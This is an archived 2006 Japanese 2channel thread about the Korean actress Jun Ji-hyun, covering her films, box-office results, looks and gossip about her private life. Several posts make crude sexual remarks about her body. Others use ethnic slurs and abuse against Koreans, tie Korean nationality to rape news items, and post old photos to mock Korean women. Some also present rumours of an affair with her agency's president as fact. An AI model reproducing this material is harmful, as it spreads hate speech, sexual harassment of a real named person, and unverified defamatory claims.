2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆◆◆◆◆チョン・ジヒョン◆◆◆◆◆ 6

1 :脱走兵:2006/03/29(水) 23:18:36
映画『猟奇的な彼女』で大ブレイクした韓国の女優さんです。
またファッションやCMのモデルとしても大活躍中。

過去スレ、関連スレ等については、
見事に整理されている↓のサイトを参照願います。

ttp://sassy.nobody.jp/

2 :魅せられた名無しさん:2006/03/29(水) 23:38:38
「独島スカーフ」 新大久保で発売へ
http://live22x.2ch.net/test/read.cgi/news/1143639889/



3 :魅せられた名無しさん:2006/03/29(水) 23:40:19
>>1
乙です!

4 :魅せられた名無しさん:2006/03/30(木) 00:52:38
かわいいけど中国系

5 :アラッチ♪ブログ:2006/03/30(木) 12:38:04
私のコロコロ変わる好きなモノや俳優(チョン・ジヒョン、チョン・ウソン、イ・ヒョリ)など力を抜いて紹介していくブログです。
by id-Quincy

6 :魅せられた名無しさん:2006/03/30(木) 13:54:50
かわいいけど人気低迷

7 :魅せられた名無しさん:2006/03/30(木) 14:24:29
ジヒョンヲタアラコテ粘着ストーカー男肝

8 :魅せられた名無しさん:2006/03/30(木) 14:57:30
>5
おまえ最低だな

9 :魅せられた名無しさん:2006/03/30(木) 15:11:27
>>5
あなた釣り名人ねw

10 :魅せられた名無しさん:2006/03/30(木) 15:14:39
やっぱりそのブロガーってジヒョンヲタなんじゃん?

11 :魅せられた名無しさん:2006/03/30(木) 15:19:58
肝粘着>>5はウソンに嫉妬
よって粘着>>5は負け組。

12 :魅せられた名無しさん:2006/03/30(木) 15:23:49
>>10
長身美貌憧れの象徴ジヒョンちゃんヲタは男だけじゃありませんが何か?

13 :魅せられた名無しさん:2006/03/30(木) 15:27:06
スルー出来ない馬鹿も粘着と同罪

14 :魅せられた名無しさん:2006/03/30(木) 15:46:15
ttp://headlines.yahoo.co.jp/hl?a=20060322-00000039-sanspo-ent
もっとファン集まってやれよ (゚Д゚)y─┛~~ 

15 :魅せられた名無しさん:2006/03/30(木) 15:52:26
到着ロビーに登場。いつになくファンの呼びかけに手を振り笑顔で応えていた






が、集まっていた約250人の過半数はジヒョンの到着後に帰国したリュ・シウォン(33)のファンだったとみられる。


16 :魅せられた名無しさん:2006/03/30(木) 16:36:33
粘着肝ヲタとレズビアンブロガー、
喧嘩は他でやってください。
ジヒョンスレを荒らさないでください!

17 :魅せられた名無しさん:2006/03/30(木) 17:14:22
>>16
さてはオマエが粘着だな?

スルーすりゃいいのに
これじゃジヒョンスレの意味がねぇな

18 :魅せられた名無しさん:2006/03/30(木) 17:34:37
>>16
ウソンヲタのどこがレズビアンに見えるの?
レズビアンさん♪

19 :ジヒョンちゃん:2006/03/30(木) 17:43:55
もちぢゅいでぐだじゃい。
みなしゃんおぢゃでムォ飲んでー
仲良ぐじでぐだじゃい。

‖・ο・‖つ旦~旦~旦~旦~旦~

20 :魅せられた名無しさん:2006/03/30(木) 17:45:39
ジヒョンの女ヲタはレズビアン

21 :魅せられた名無しさん:2006/03/30(木) 17:51:52
>>20
工エエェェ(´д`)ェェエエ工

それはないとオモ

>>19
つ旦~
d!いただきまつ。

22 :魅せられた名無しさん:2006/03/30(木) 18:12:31
アラッチ♪ブログの由来

23 :魅せられた名無しさん:2006/03/30(木) 18:15:05
ドラマやる?

24 :魅せられた名無しさん:2006/03/30(木) 18:43:00
レイプ牧師 金保(韓国籍)

ttp://zetubou.mine.nu/timer/file/bomber14721_d60.jpg
ttp://zetubou.mine.nu/timer/file/bomber14722_d60.png
ttp://zetubou.mine.nu/timer/file/bomber14723_d60.jpg
ttp://zetubou.mine.nu/timer/file/bomber14724_d60.jpg
ttp://zetubou.mine.nu/timer/file/bomber14727_d60.jpg
ttp://zetubou.mine.nu/timer/file/bomber14726_d60.jpg


25 :魅せられた名無しさん:2006/03/30(木) 18:54:53
可愛いよね。

26 :脱走兵:2006/03/30(木) 20:19:32
ジヒョンのユルマンとウソンの巨砲はお似合い♪

27 :魅せられた名無しさん:2006/03/31(金) 04:42:53
韓国の誇りだね

28 :アラッチ♪ブログ:2006/03/31(金) 09:05:32
ジヒョンのマンコはビラビラがでかすぎる

29 :脱走兵:2006/03/31(金) 09:35:46
ビラビラはっぽっってり亀裂は長い
口の形状からして

30 :魅せられた名無しさん:2006/03/31(金) 14:18:41
ああそう

31 :魅せられた名無しさん:2006/03/31(金) 23:15:33
ヒント:>>28=フンタク

32 :アラッチ♪ブログ:2006/03/32(土) 01:06:38
フンタクの肛門まで舐めるジヒョンは偉い

33 :魅せられた名無しさん:2006/03/32(土) 11:05:03
韓国美人だね

34 :魅せられた名無しさん:2006/03/32(土) 15:58:39
韓国整形美人だね

35 :魅せられた名無しさん:2006/03/32(土) 18:23:46
ビラビラも整形してんのかな?

36 :アラッチ♪ブログ:2006/04/02(日) 00:14:36
ビラビラって擦れると痛いんだから。
男にはわかんないだろうけど。

37 :魅せられた名無しさん:2006/04/02(日) 00:40:52
休み長く取るのは整形のためでもあるんだろうな

38 :魅せられた名無しさん:2006/04/02(日) 18:43:52
ここ過去ログついて無いじゃん
スレ立て直してクリトリス

39 :魅せられた名無しさん:2006/04/02(日) 20:27:06
>>38
>>1

40 :魅せられた名無しさん:2006/04/03(月) 08:51:58
精神身体障害者である、友達の妻に性暴行 無職男を逮捕 - 韓国・釜山
http://news18.2ch.net/test/read.cgi/dqnplus/1143990288/


41 :魅せられた名無しさん:2006/04/04(火) 12:22:41
ジヒョンって人気なくなったねw

42 :魅せられた名無しさん:2006/04/04(火) 15:30:23
ジヒョンのビラビラは人気あるぞw

43 :魅せられた名無しさん:2006/04/04(火) 16:23:24
『デイジー』興業成績(韓国)

第一週 1位

第二週 5位

第三週 10位

う〜ん。。。

44 :魅せられた名無しさん:2006/04/05(水) 01:07:38
この下落ぶりはジヒョン人気と同じなのか‥

45 :魅せられた名無しさん:2006/04/05(水) 12:00:18
他にも大きな映画が目白押しなんじゃないの?<下落の原因
それにしてもヒドいけどな…

46 :魅せられた名無しさん:2006/04/05(水) 12:04:17
大根女優だもんしゃーない

47 :魅せられた名無しさん:2006/04/05(水) 13:58:29
脚本もアレだしな

48 :魅せられた名無しさん:2006/04/05(水) 14:50:43
ビラビラもアレだしな

49 :魅せられた名無しさん:2006/04/05(水) 17:01:04
今週は10位から20位に一気に落ちた模様。。。

50 :アラッチ♪ブログ:2006/04/05(水) 17:29:19
http://fashion.innolife.net/img/item/2329_2.jpg

51 :魅せられた名無しさん:2006/04/05(水) 18:47:59
このスレ開こうとする時だけ重くなる
もしかしてウィルス貼ってある?

52 :魅せられた名無しさん:2006/04/05(水) 21:40:56
>>51
お前の日頃の行いが悪いから。

53 :魅せられた名無しさん:2006/04/05(水) 23:47:16
あんなに可愛いい人はみたことがない ジヒョンは可愛い

54 :魅せられた名無しさん:2006/04/06(木) 03:03:27
>>52がウィルス

55 :魅せられた名無しさん:2006/04/06(木) 03:10:41
ジヒョンってドラマ出てたっけ?

56 :魅せられた名無しさん:2006/04/06(木) 17:22:28
>>55
過去のか?私の心を奪ってに出てた。
DVD全部ある。

57 :魅せられた名無しさん:2006/04/06(木) 23:57:53
売り方を間違ったな。

58 :魅せられた名無しさん:2006/04/07(金) 08:41:37
キスシーンすら拒むんだから売り方も何も・・

59 :魅せられた名無しさん:2006/04/07(金) 10:53:23
ジヒョン〜魅力的だけど、猟奇のイメージが強すぎるのでは?

60 :魅せられた名無しさん:2006/04/07(金) 12:45:47
作品選びにセンスが無さすぎ。
女優としては致命的。

61 :魅せられた名無しさん:2006/04/07(金) 16:31:04
香港の試写会、ヒールはくなんて卑怯だぞジヒョン

62 :魅せられた名無しさん:2006/04/09(日) 14:28:26
キスシーンくらいしろよな。

63 :魅せられた名無しさん:2006/04/09(日) 14:47:43
所詮CMタレント


64 :魅せられた名無しさん:2006/04/09(日) 16:03:16
もう終わったタレント。

65 :魅せられた名無しさん:2006/04/12(水) 01:34:31
最近プロモで香港だかどっか行ったでしょ
で、最新画像探してみようと思ってヤフー中国語とかで
ジヒョンの漢字読みで検索したんだけどさー
人気検索例っていうの?そこにさ、

チョンジヒョン ベッドシーン
  とか
チョンジヒョン ライブベッドシーン

とかやたらいっぱい出てるんだよ(訳すと)
ジヒョンは映画でベッドシーンやってないはずだし・・
もしかしてプライベートビデオかなんか流出したのか?

気になる


66 :魅せられた名無しさん:2006/04/14(金) 11:13:18
アラッチブログw
詳しくはウソンスレで

67 :魅せられた名無しさん:2006/04/14(金) 12:47:19
id-Quincy吊るしあげられてるね
2ちゃんって、こえ〜〜〜w

68 :魅せられた名無しさん:2006/04/17(月) 00:55:01
このように名前を並べただけでも、韓国最大の大手プロダクションということがおわかりいただけると思います。
社長の チョン・フンタクと女優のチョン・ジヒョンが付き合っていることは、韓国の業界の中では有名な話です。
http://www.fuyusona.com/k-news/006/

69 :魅せられた名無しさん:2006/04/23(日) 21:29:00
つ ttp://pds.exblog.jp/pds/1/200604%2F23%2F88%2Fa0031088%5F1521657%2Ejpg

70 :魅せられた名無しさん:2006/04/24(月) 12:19:59
イルマーレってハリウッドリメイクされるのけ??

71 :魅せられた名無しさん:2006/04/24(月) 17:21:05
>>69
・・・。orz

72 :魅せられた名無しさん:2006/04/24(月) 18:22:52
>>70
されたら早くみたいけどね

http://www.youtube.com/watch?v=r4YzQtH9YOs&search=ilmare
この曲は何?

73 :魅せられた名無しさん:2006/04/24(月) 18:33:24
>>70
記事ありました
ttp://contents.innolife.net/news/list.php?ac_id=4&ai_id=37594

74 :魅せられた名無しさん:2006/04/27(木) 20:47:45
鼻にポチッとあるホクロがかわいい

75 :魅せられた名無しさん:2006/05/01(月) 14:16:44
鼻にあるホクロをポチッと押すと爆発

76 :魅せられた名無しさん:2006/05/02(火) 02:42:26
デイジーのCM今日初めて見れた♪

77 :魅せられた名無しさん:2006/05/02(火) 02:44:53
宣伝するだけ赤字が増える

78 :sage:2006/05/04(木) 02:52:53
5月27日からだね

79 :魅せられた名無しさん:2006/05/04(木) 03:12:23
ジヒョン可愛いよ〜凄く可愛いか微妙だけど、変な魅力があるな。

80 :魅せられた名無しさん:2006/05/04(木) 04:09:52
ジヒョン姫 世界一の美人だわ!

81 :魅せられた名無しさん:2006/05/04(木) 07:39:25
中国系は可愛いね

82 :魅せられた名無しさん:2006/05/04(木) 13:45:49
ジヒョンの時折見せるエロ顔が好き

83 :魅せられた名無しさん:2006/05/04(木) 17:23:27
http://img206.imageshack.us/img206/1646/des20qc2cv.jpg
カワユス


84 :魅せられた名無しさん:2006/05/04(木) 21:06:29
韓国映画界からは見はなされたけど
自身のルーツである中華芸能界に活動の場を移行するそうだね。

85 :魅せられた名無しさん:2006/05/04(木) 21:11:12
来月のテヒョンの結婚式に出席しなかったら、もうファンやめる。
神秘主義もほどほどにしろって感じ。

86 :魅せられた名無しさん:2006/05/04(木) 21:21:24
「デイジー」は最後にジヒョンちゃんが死ぬんだね。
三角関係を終らせるには無難なラストかな。

87 :魅せられた名無しさん:2006/05/05(金) 02:36:47
死ぬのは某雑誌を見てわかってたけど、どういったシチュエーションかですよね。
見た方いるかもしれませんが、ネタバレに注意しないとな(笑み)

88 :魅せられた名無しさん:2006/05/05(金) 04:15:48
「エンディング・シーンは蛇足?」
チョン・ジヒョンがチョン・ウソンの腕の中で死んで行く場面は
女性の観客たちが涙をこぼすほどに最高のハイライトとして数えられる。

しかし胸深く掘り下げた感動は、そのあとの香港式復讐戦によって台無しになる。
映画を見た観客たちの「チョン・ジヒョンの死で映画が終わるべきだった」と強く惜しがる声がネット上に数多く寄せられている。

先週末「デイジー」を見たという35歳の女性は、
「チョン・ジヒョンがチョン・ウソンの腕の中で死んで行く時に流れる歌に涙が溢れました。
でもそのあとのチョン・ウソンの復讐場面で、その感動が消されてしまって残念です。」と語った。

89 :魅せられた名無しさん:2006/05/06(土) 03:18:11
テヒョン結婚するのか。今知った。

90 :(^_^)/:2006/05/06(土) 16:04:00
【韓流】ソン・イェジン主演のSBS人気ドラマ「恋愛時代」、今年秋にも日本で放送予定
http://news18.2ch.net/test/read.cgi/mnewsplus/1146811959/

91 :魅せられた名無しさん:2006/05/06(土) 16:09:02
>>90
そのドラマ、韓国のチングが今ハマってるって言ってた。
すんごい面白いらしいよ。

92 :魅せられた名無しさん:2006/05/06(土) 22:03:26
黒田福美”韓流は原爆”発言_1227_ザ!情報ツウ800 .avi
ttp://small-antenna.dyndns.org/uploader/omoshiro/src/up0134.avi


93 :魅せられた名無しさん:2006/05/07(日) 07:18:28
おはよう。ジヒョン姫♪

94 :魅せられた名無しさん:2006/05/07(日) 15:12:19
http://blogimg.goo.ne.jp/user_image/75/59/87ac6706d4f46d7b900a61b08406a2bd.jpg

酷ぇwwwwwwww

95 :魅せられた名無しさん:2006/05/08(月) 17:28:48
>>94
整形してることぐらい皆知ってますが何か?

96 :魅せられた名無しさん:2006/05/09(火) 15:44:43
普通の人は整形したからって、ジヒョン姫のようになれないよ♪
ジヒョン姫は元が良いんたよ♪

97 :魅せられた名無しさん:2006/05/09(火) 16:40:22
>>96
フォローになってないw

98 :魅せられた名無しさん:2006/05/09(火) 19:02:21
【韓流】美しさと気品で日本を魅了したイ・ヨンエ
http://news18.2ch.net/test/read.cgi/mnewsplus/1147142337/

99 :魅せられた名無しさん:2006/05/10(水) 18:36:51
ヨンエさんと結婚したい

100 :魅せられた名無しさん:2006/05/11(木) 09:30:56
100

101 :魅せられた名無しさん:2006/05/12(金) 17:58:19
知らない

102 :魅せられた名無しさん:2006/05/14(日) 12:29:29
コ・ソヨン様をひたすら語ろう!!
http://tv8.2ch.net/test/read.cgi/celebrity/1146066944/

103 :魅せられた名無しさん:2006/05/15(月) 18:36:08
猟奇的な彼女のアメリカ版リメイクは、
製作会社がDream Worksから Gold Circleに変わり、
この秋クランク・インの予定。
監督はYann Samuell。

ttp://www.imdb.com/title/tt0404254/

104 :魅せられた名無しさん:2006/05/15(月) 21:29:47
セクシーすぎます・・・
http://japanese.joins.com/article/article.php?aid=75727&servcode=700§code=710

105 :魅せられた名無しさん:2006/05/18(木) 01:53:35
黒谷友香に似てる

106 :魅せられた名無しさん:2006/05/21(日) 00:03:30
キスシーンはあるの?

107 :魅せられた名無しさん:2006/05/21(日) 00:09:12
チョン

108 :魅せられた名無しさん:2006/05/21(日) 00:13:56
凡庸で箸にもかからないチョン

109 :チョン :2006/05/21(日) 00:51:07
                   ハ_ハ
                 (^<`∀´>^)
                  )  /
                  (_ノ_ノ

            \从/_
 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ
T  |   l,_,,/\ ,,/l  |
,.-r '"l\,,j  /  |/  L,,,/
,,/|,/\,/ _,|\_,i_,,,/ /
_V\ ,,/\,|  ,,∧,,|_/

110 :魅せられた名無しさん:2006/05/21(日) 09:39:42
事件・事故:性的暴行繰り返した疑いで男を最終送検 /京都

 府警捜査1課と五条署などは1日までに、強姦などの疑いで下京区屋形町の
無職、金義昭被告(22)=同罪などで公判中=を逮捕、送検した。容疑を
認めているという。調べでは、金被告は04年4月中旬から同11月までの間、
同区や大阪府高槻市などで、トイレを借りるように装い住居に侵入、10〜20
歳代の女性を狙い6件の性的暴行事件を繰り返していた疑い。今年1月11日に
同罪と住居侵入容疑で逮捕された。

毎日新聞
ttp://www.mainichi-msn.co.jp/chihou/kyoto/news/20060502ddlk26040372000c.html

京都新聞
ttp://www.kyoto-np.co.jp/article.php?mid=P2006050100182&genre=C1&area=K1F
無職野村義昭被告(22)

111 :魅せられた名無しさん:2006/05/21(日) 11:17:29
糞 ダサい映画 糞優 糞人!糞キムチ 整形婆 金汚い韓人 野蛮韓人 反日一番の韓人 平気に火を付ける韓人 レイプ激しい韓人 暴動好き韓人 日本人大嫌い韓人 なぜ我日本国の人韓人好きなんだろう!

112 :魅せられた名無しさん:2006/05/24(水) 16:09:01
全智賢は許す!

113 :ジヒョンLOVE:2006/05/24(水) 19:48:51
盗撮行為で書類送検の日テレ・炭谷宗佑アナがとデイジーで来日時のジヒョンが。
http://s2.muryo-de.etowns.net/~china/
彼女も盗撮された可能性大・・・・・。

114 :魅せられた名無しさん:2006/05/24(水) 22:28:08
来日していたのか?

115 :魅せられた名無しさん:2006/05/24(水) 22:36:33
二重あごになってた。
ショック(つД`)

116 :魅せられた名無しさん:2006/05/24(水) 22:59:28
劣化がひどいな

117 :魅せられた名無しさん:2006/05/25(木) 11:01:36
モックンの嫁に似とる

118 :魅せられた名無しさん:2006/05/26(金) 04:32:09
韓タメにでてたな
かわいかった

119 :魅せられた名無しさん:2006/05/26(金) 05:14:50
>>117
似てるw
毒のある顔してるよな。


120 :魅せられた名無しさん:2006/05/26(金) 10:52:34
おすぎに無視されてた、
ウソンしか視界に入ってないおすぎ・・・

121 :魅せられた名無しさん:2006/05/26(金) 15:18:33
おすぎ、GJ!

122 :魅せられた名無しさん:2006/05/26(金) 17:43:38
日本CM出演おめでとうございます♪
http://japanese.joins.com/article/article.php?aid=76131&servcode=700§code=710

123 :魅せられた名無しさん:2006/05/27(土) 02:40:21
女から見てもカワイイ!
なんとも言えない魅力があるよね。今、私が不倫してる相手の女房がジヒョンに似てる感じの人で見るたびに憎たらしいけど、やっぱカワイイ(*^_^*)

124 :魅せられた名無しさん:2006/05/27(土) 09:10:21
この人ブサなのに勘違いしてそうだよね

125 :魅せられた名無しさん:2006/05/27(土) 14:15:36
映画はヒットしたけど、
日本では全然人気でない・・・なんで?


126 :魅せられた名無しさん:2006/05/27(土) 14:46:36
>115
撮影が終わると太るのは毎度の事だから無問題。

デイジー観てきた。
ストーリーも良かったけど、ジヒョン姫可愛かったぁ(*´д`)

127 :魅せられた名無しさん:2006/05/27(土) 15:15:22
元来のジヒョンファンはジヒョンの劣化に耐え切れないから
ショックでこのスレも廃れた

最近のジヒョンを見て可愛いと思えるのは凄いね・・
ふてぶてしさしか感じなくなったなぁ

猟奇的〜のジヒョンは神なので是非イメージぐぐってみて・・
今のジヒョンがどれだけダメかわかると思う
彼女独特の不思議な魅力が無くなってしまったんだよ


128 :魅せられた名無しさん:2006/05/27(土) 15:27:13
相変わらずの大根ぶりだしな。
CMだけだろ、こいつの本領発揮は。


129 :魅せられた名無しさん:2006/05/27(土) 15:51:09
前からふてぶてしさしか感じませんが?
役を演じてる時は別だけど・・・

130 :魅せられた名無しさん:2006/05/27(土) 16:42:40
中国系って家族の誰が中国人なの?

131 :魅せられた名無しさん:2006/05/27(土) 16:43:57
整形大国







132 :魅せられた名無しさん:2006/05/27(土) 17:40:17
ジヒョン、ブスになったなぁ
顔が角ばってない?
浮腫んでるのか?

顔いじり過ぎで別人みたい
不幸そうだし。
精神病で整形繰り返しちゃうってやつじゃない?

133 :魅せられた名無しさん:2006/05/27(土) 17:49:25
映画の中ではまだいいけどそれ以外ではかなりブス。
確かに情緒不安定っぽくもあるな


134 :魅せられた名無しさん:2006/05/27(土) 17:50:21
>>132
そうすると、行く末は例の韓国エレファントおばさんか・・・。

135 :魅せられた名無しさん:2006/05/27(土) 18:08:40
>>133
愛想がないって言うか、
可愛げがないよね?

136 :魅せられた名無しさん:2006/05/27(土) 18:29:39
初心者ファンですが↑読んで昔の?ジヒョンの画像見ましたけど
本と、ネ申ですね。あんなに可愛いかったんだ
今の彼女は全然顔違いますね
老けたってのもあるけど整形繰返したっぽいですね

んーこりゃちょっと退くかも
どうでもよくなってきた
云われてみれば全身に不幸感バリバリですね


137 :魅せられた名無しさん:2006/05/27(土) 18:31:47

ショックだからか、ですね攻撃すまそ

138 :魅せられた名無しさん:2006/05/27(土) 18:39:52
ジヒョンは堕ちてくのみだなw

139 :魅せられた名無しさん:2006/05/27(土) 19:28:03
覚悟はしてたが映画の中でもブサになってた
引き付ける魅力もなくなったな
カッコつけたことばかり発言してるようだが
所詮泣けるCMタレント

140 :魅せられた名無しさん:2006/05/27(土) 20:37:08
深みのある演技、作風が大好きな北野武監督と仕事をしたいだって。

141 :魅せられた名無しさん:2006/05/27(土) 21:02:23
>>140
身の程知らずにも限度があるっつうの
たかがCMモデルが必死に演技派アピールwww
言語が通じないのに酷い大根ということだけは分るって、よっぽどだな

142 :魅せられた名無しさん:2006/05/27(土) 22:18:42
ホント勘違いしてきてるな…残念ながら呆れるよ
日本オタと大陸オタの扱い違いも凄まじいもん見せてくれたが
もう日本来なくていいからw姦国でガンガレww
ま、社長とセックルしてる間はブサだろうが大根だろうが整形依存だろうが安泰なんでしょうなw


143 :魅せられた名無しさん:2006/05/27(土) 23:19:59
社長との仲は否定してますよ。
裁判で勝ったはず。

144 :魅せられた名無しさん:2006/05/27(土) 23:42:39
>>143
そりゃ否定隠蔽するでしょ

145 :魅せられた名無しさん:2006/05/28(日) 00:18:36
示談で決着したんだよね。
興味深かったのは記事内容そのものを被告側が虚偽と認めなかったこと。
社長とジヒョンに取材しなかったことを詫びているだけ。
あれはかなりショックだったな。。。

146 :魅せられた名無しさん:2006/05/28(日) 01:05:00
>>145
そうそう、虚偽を認めないままだったよね
しかもニューシースで普通に記事になってたけど
韓国ニュースでいきなり嘘記事載せるってのも見ないし
どっかから流れたのヤバスなこと知らずにニューシースが載せたんだろうね

そもそもデイジーは「大人のラブストーリー」なのに
ジヒョンにキスシーン抱擁シーンでさえもないことが語ってるよ。
違和感アリアリw

147 :魅せられた名無しさん:2006/05/28(日) 15:26:21
女優としては終わってる・・

148 :魅せられた名無しさん:2006/05/28(日) 18:14:39
社長不細工すぎ・・・

149 :魅せられた名無しさん:2006/05/28(日) 18:59:03
不細工だが韓国芸能界最大のプロダクション社長

150 :魅せられた名無しさん:2006/05/29(月) 00:22:00
将来は社長夫人?
なんかがらじゃないような・・・・

151 :魅せられた名無しさん:2006/05/29(月) 01:06:17
>>150
あの勘違いさと傲慢さは十分柄に属すると思う
社長のオキニ(婚約者肉弁)だから長期休んでバカンスも余裕
いい生活送ってるよなあ…なんだあれ
長期休暇は整形バレ防止なんだろうね?
顔は変わってないと思ってたが明らかに変わったよ

152 :魅せられた名無しさん:2006/05/29(月) 01:09:08
ついでにいうと
最大の魅力である「自然さ、自然体」はなくなったね

153 :魅せられた名無しさん:2006/05/29(月) 03:29:22
ジヒョンに対する嫉妬すごいなあ

154 :魅せられた名無しさん:2006/05/29(月) 03:49:50
>>153
ageんなチョン!

155 :魅せられた名無しさん:2006/05/29(月) 07:52:02
嫉妬じゃなくて嘲笑みたいなもんかも

156 :魅せられた名無しさん:2006/05/29(月) 09:28:33
ジヒョンの美しさに劣等感と嫉妬心を抱くなよ


いい歳してみっともないよ(笑)
 
 

157 :魅せられた名無しさん:2006/05/29(月) 09:42:55
太ってブスになった事を素直に認めたくない可愛そうなヲタw
ますます中国人っぽくヤボったくなってきた

158 :魅せられた名無しさん:2006/05/29(月) 09:52:20


ジヒョンがアジアで韓国を代表するトップ女優なのが気に入らないのか(笑)

159 :魅せられた名無しさん:2006/05/29(月) 09:56:40



まぁジヒョンは華僑だしなぁ(笑)




160 :魅せられた名無しさん:2006/05/29(月) 10:03:17

↓日本併合時、当然美容整形がなかった時代の韓国女性。
皆、容姿が醜く、子持ちの女性は胸をはだけている。

http://park6.wakwak.com/~photo/image/09.jpg
http://park6.wakwak.com/~photo/image/10.jpg
http://park6.wakwak.com/~photo/image/11.jpg
http://park6.wakwak.com/~photo/image/12.jpg
http://park6.wakwak.com/~photo/image/13.jpg


161 :魅せられた名無しさん:2006/05/29(月) 10:31:35




ジヒョンには関係ないよ?

162 :魅せられた名無しさん:2006/05/29(月) 10:57:14
ジヒョンを擁護してるのは最近ファンになった人なんじゃないかな?
だから気持ちはなんとなく分かる。猟奇の頃なんて神だったからね。

163 :魅せられた名無しさん:2006/05/29(月) 14:42:30
>>127だけど
自分も改めてジヒョンの昔の写真見たんだ(マイピクチャーに沢山キープ)
最近のジヒョンとは本当に別人?ってほどの違いがあるよ

自分のお気には猟奇的〜のプロモで来日した時のかな?
水色の袖なしセーター着てるやつ。どれも神的に可愛い。

最近のジヒョンを初めて見たとして、猟奇的の頃に感じた
あれほどの魅力を見出せないと思う
キレイな女優さんだなとは今でも思うけどね
一時は 

うわぁ、何この子!何この魅力ってか魔力!

って夢中だったけど魔法が解けたようだ





164 :魅せられた名無しさん:2006/05/29(月) 15:25:52
女優としても大根すぎて話にならんしね

165 :魅せられた名無しさん:2006/05/29(月) 15:55:59
同じコケるなら内容のある映画でコケて欲しい。
ペ・ドゥナみたいに。

166 :魅せられた名無しさん:2006/05/29(月) 16:16:30
ドゥナブサでキモイ
おっぱい丸出しで下品すぎ

167 :魅せられた名無しさん:2006/05/29(月) 16:42:47
俺もドゥナは好きだが
演技派のドゥナと大根のジヒョンを比べるのもどうかと思う。

168 :魅せられた名無しさん:2006/05/29(月) 19:18:07
えっ!おっぱい丸出ししてるの?

169 :魅せられた名無しさん:2006/05/29(月) 19:37:23
ドゥナタソエチ上手だ

170 :魅せられた名無しさん:2006/05/29(月) 21:15:42
初登場6位だってさ
ウソンのとことも御通夜状態w
ジヒョンはこれからどうするの?

171 :魅せられた名無しさん:2006/05/29(月) 21:29:50
今後も社長の愛人を続けながらCMでがっぽり稼ぎまつ。
女優としてはもう・・・
1年くらい遊んでからまたイメージを壊さない役をやるでしょう。

172 :魅せられた名無しさん:2006/05/29(月) 22:09:42

797 :名無シネマさん :2006/05/29(月) 21:19:02 ID:gDMRlCOt
《5/27 〜 5/28》 【全国ランキング】
1 ダ・ヴィンチ・コード
2 LIMIT OF LOVE 海猿
3 明日の記憶
4 嫌われ松子の一生
5 GOAL!
6 デイジー  ← ゚( ゚^∀^゚)゚。アーッハハ八八ノヽノヽノヽノ\ / \
7 名探偵コナン 探偵たちの鎮魂歌〈レクイエム〉
8 ナイロビの蜂
9 夢駆ける馬ドリーマー
0 間宮兄弟


173 :魅せられた名無しさん:2006/05/29(月) 22:20:45
太ったっていいぢゃないか。
にんげんだもの。
         さちお。

174 :魅せられた名無しさん:2006/05/29(月) 23:58:31
問題は2週目だね、
何処まで踏ん張れるか・・・

175 :魅せられた名無しさん:2006/05/30(火) 00:18:31
現実を少しはジヒョンに知らせないとだな
とりあえず俺はデイジー見ずに家で猟カノ見ることにしたw

176 :魅せられた名無しさん:2006/05/30(火) 01:27:11
>>175
あなたはファンの鑑♪

177 :魅せられた名無しさん:2006/05/30(火) 11:48:59
ジヒョンかわええ

178 :魅せられた名無しさん:2006/05/30(火) 12:44:19
>>177
m9(^Д^)プギャー

179 :魅せられた名無しさん:2006/05/30(火) 12:57:01
ジヒョンかわええ

180 :魅せられた名無しさん:2006/05/30(火) 16:40:10
うっ

181 :魅せられた名無しさん:2006/05/30(火) 17:37:44
かわええ長澤まさみかわええ

182 :魅せられた名無しさん:2006/05/30(火) 21:17:57
勧告ではまだ人気あるの?
猟カノで憧れたんだけど、最近なんの役しても
しょせん社長の女としか感じなくなっちゃった…
すごい好きだったのにな

183 :魅せられた名無しさん:2006/06/01(木) 00:06:42
デイジーはジヒョンじゃなくていいと思った


184 :魅せられた名無しさん:2006/06/01(木) 00:22:07
ジヒョンちゃん、ホントはエロいんだから、エロシーン演じなきゃだめだよ。

185 :魅せられた名無しさん:2006/06/01(木) 19:44:51
テヒョンの結婚式なのに欠席とは・・
共演者とか仲間の俳優、みんな当然のように参加してるのにさ・・

186 :魅せられた名無しさん:2006/06/01(木) 20:16:34
神秘主義以前の問題だよね。。。悲しいね。

187 :魅せられた名無しさん:2006/06/01(木) 20:20:14
デイジーNG集
http://vod2.ytn.co.kr/ytnstar/general/mov/br_enter/2006/06/200606011701534033_s.wmv

188 :魅せられた名無しさん:2006/06/01(木) 20:54:31
>>185
大物俳優や、ニュースになりそうな韓流スターが誰も来てないって話だけど


189 :魅せられた名無しさん:2006/06/01(木) 20:59:36
韓流スターwwwwwww

190 :魅せられた名無しさん:2006/06/01(木) 21:04:10
「猟奇的」のヒットだけでやってきたジヒョンは出席しても良かっただろ

191 :魅せられた名無しさん:2006/06/02(金) 21:44:49
>>187
グロ注意

192 :魅せられた名無しさん:2006/06/03(土) 12:50:34
韓国男優って腐男子多くね

193 :魅せられた名無しさん:2006/06/03(土) 22:42:03
テヒョンの結婚式出席してやれよ。

人間性疑うわ。

どんな性格なんだよ。

194 :魅せられた名無しさん:2006/06/04(日) 08:25:50
だからー、イメージが崩れるだろ

195 :魅せられた名無しさん:2006/06/04(日) 20:44:04
もうどうしようもないCMタレントだな
ずっと愛人でもやってろ

196 :魅せられた名無しさん:2006/06/05(月) 20:33:34
社長は独身なんでしょう?
愛人じゃなくて恋人・・・

197 :魅せられた名無しさん:2006/06/05(月) 21:33:34
正確には婚約者

198 :魅せられた名無しさん:2006/06/05(月) 23:49:12
マシュー見のがしたー!!
どなたかUPを!!


199 :魅せられた名無しさん:2006/06/08(木) 00:57:08
マシューに出てたの?

200 :魅せられた名無しさん:2006/06/08(木) 18:10:34
>>172
日本映画って結構頑張ってるね。
韓国みたいに規制ないのにさ。

201 :魅せられた名無しさん:2006/06/10(土) 02:40:29
age

202 :魅せられた名無しさん:2006/06/19(月) 16:24:55
かわいいな〜〜チョン・ジヒョン

203 :魅せられた名無しさん:2006/06/19(月) 16:29:34
朝鮮人はみんなキモイ

204 :魅せられた名無しさん:2006/06/21(水) 18:10:43
大鐘賞にノミネートされたね

205 :魅せられた名無しさん:2006/06/21(水) 22:51:18
>>204
韓国七不思議だそうです

206 :魅せられた名無しさん:2006/06/24(土) 11:35:04
>>194
亀レスで申し訳ないが言わせてほしい

結婚式に出たぐらいで崩れるようなイメージならば
とっとと崩れてしまえばいいよ。守る価値なし

207 :魅せられた名無しさん:2006/07/03(月) 23:17:43
